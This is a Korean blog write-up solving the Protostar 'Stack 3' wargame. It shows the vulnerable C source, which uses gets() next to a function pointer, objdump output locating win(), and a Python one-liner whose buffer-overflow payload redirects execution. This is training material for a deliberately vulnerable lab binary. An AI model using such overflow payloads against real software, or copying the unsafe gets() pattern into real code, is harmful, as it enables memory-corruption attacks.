Protostar - Stack 3

Wargame/Exploit-Exercises 2014. 5. 15. 14:36

1. 문제 Source

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
 printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
 volatile int (*fp)();
 char buffer[64];

 fp = 0;

 gets(buffer);

 if(fp) {
  printf("calling function pointer, jumping to 0x%08x\n", fp);
  fp();
 }
}

2. 풀이

user@protostar:/opt/protostar/bin$ objdump -d ./stack3

./stack3:     file format elf32-i386

...
Disassembly of section .text:
...
08048424 <win>::
 8048424:	55                   	push   %ebp
 8048425:	89 e5                	mov    %esp,%ebp
 8048427:	83 ec 18             	sub    $0x18,%esp
 804842a:	c7 04 24 40 85 04 08 	movl   $0x8048540,(%esp)
 8048431:	e8 2a ff ff ff       	call   8048360 <puts@plt>
 8048436:	c9                   	leave  
 8048437:	c3                   	ret
...

user@protostar:/opt/protostar/bin$ python -c "print 'A'*64 + '\x24\x84\x04\x08'" | ./stack3
calling function pointer, jumping to 0x08048424
code flow successfully changed

'Wargame > Exploit-Exercises' 카테고리의 다른 글

Protostar - Stack 5 (0)	2014.05.19
Protostar - Stack 4 (0)	2014.05.15
Protostar - Stack 2 (0)	2014.05.15
Protostar - Stack 1 (0)	2014.05.15
Protostar - Stack 0 (0)	2014.05.14

ABOUT ME

잭파드의 외장뇌 잭파드의 외장뇌

'Wargame > Exploit-Exercises' 카테고리의 다른 글

티스토리툴바

ABOUT ME

'Wargame > Exploit-Exercises' 카테고리의 다른 글

관련글 관련글 더보기

티스토리툴바